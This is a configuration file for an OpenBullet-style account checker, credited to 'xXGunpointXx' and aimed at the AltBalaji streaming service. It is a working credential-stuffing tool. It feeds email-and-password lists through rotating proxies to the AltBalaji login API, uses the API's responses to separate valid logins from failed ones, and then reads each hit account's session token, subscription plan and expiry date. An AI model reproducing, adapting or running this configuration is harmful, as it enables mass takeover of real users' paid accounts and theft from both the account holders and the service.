[SETTINGS]
{
  "Name": "AltBalaji",
  "SuggestedBots": 50,
  "MaxCPM": 0,
  "LastModified": "2019-09-19T01:23:17.0554867+05:30",
  "AdditionalInfo": "proxyLess",
  "Author": "xXGunpointXx",
  "Version": "1.3.9 [Anomaly]",
  "LoliSave": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "Base64": "",
  "Grayscale": false,
  "RemoveLines": false,
  "RemoveNoise": false,
  "Dilate": false,
  "Threshold": 1.0,
  "DiffKeep": 0.0,
  "DiffHide": 0.0,
  "Saturate": false,
  "Saturation": 0.0,
  "Transparent": false,
  "OnlyShow": false,
  "ContrastGamma": false,
  "Contrast": 1.0,
  "Gamma": 1.0,
  "Brightness": 1.0,
  "RemoveLinesMin": 0,
  "RemoveLinesMax": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
FUNCTION GetRandomUA -> VAR "UA" 

REQUEST POST "https://api.cloud.altbalaji.com/accounts/login?domain=IN" 
  CONTENT "{\"username\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "Host: api.cloud.altbalaji.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: <UA>" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Content-Type: application/json;charset=UTF-8" 
  HEADER "Origin: https://www.altbalaji.com" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Referer: https://www.altbalaji.com/" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{\"status\":\"ok\",\"session_token\":\"" 
  KEYCHAIN Failure OR 
    KEY "Username not found" 
    KEY "Username and password do not match" 

PARSE "<SOURCE>" JSON "session_token" -> VAR "token" 

REQUEST GET "https://payment.cloud.altbalaji.com/accounts/orders?domain=IN&limit=12&order_status=ok" 
  
  HEADER "Host: api.cloud.altbalaji.com" 
  HEADER "Connection: keep-alive" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: <UA>" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Content-Type: application/json;charset=UTF-8" 
  HEADER "Origin: https://www.altbalaji.com" 
  HEADER "Sec-Fetch-Site: same-site" 
  HEADER "Referer: https://www.altbalaji.com/my-account" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "XSSESSION: <token>" 

#Ex PARSE "<SOURCE>" LR "\",\"valid_to\":\"" "T" -> VAR "Exprie_date" 

#Pl PARSE "<SOURCE>" LR "\":{\"default\":\"ALTBalaji" "\",\"" -> VAR "PLAN" "" " ✘-Gunpoint69" 

FUNCTION Constant "PLan= <PLAN> | Valid_upto= <Exprie_date> | xXGunpointXx" -> CAP "AltBalaJi" 

#SUBS_check KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "{\"orders\":[],\"count\":0,\"" 

